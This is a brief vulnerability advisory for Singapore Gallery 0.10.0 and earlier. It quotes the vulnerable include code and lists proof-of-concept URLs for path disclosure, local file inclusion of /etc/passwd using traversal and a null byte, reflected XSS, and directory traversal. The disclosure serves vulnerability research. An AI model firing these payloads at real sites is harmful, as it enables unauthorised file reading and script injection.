Produce : singapore gallery Versions : 0.10.0 and prior Site : http://www.sgal.org/ Discovred By : Moroccan Security Research Team (Simo64) Greetz : CiM-Team - dabdoub - DarkbiteX - drackanz - Iss4m - Mourad - Rachid .:r00tkita - s4mi - Silitix - tahati - And All Friends :) [-] Vulnerable code near lignes 16-35 <? 16 . require_once "includes/singapore.class.php"; 19 . $sg = new Singapore(); 35 . include $sg->config->base_path.$sg->config->pathto_current_template."index.tpl.php"; ?> [+] Full Path Disclosure : ************************** Exemple: http://localhost/singapore/index.php?template=simo64 Result : Warning: main(templates/simo64/index.tpl.php): failed to open stream: No such file or directory in /home/sing/public_html/livedemo/index.php on line 35 [+] Local File Inclusion : *************************** Proof Of Concept : http://localhost/singapore/index.php?template=./../../../../etc/passwd%00 [+] Cross Site Scripting : ************************** http://localhost/singapore/index.php?template=<script>alert('Moroccan Security Team');</script> [+] Directory Traversal : ************************** Proof Of Concept : http://localhost/singapore/index.php?gallery=./../../../
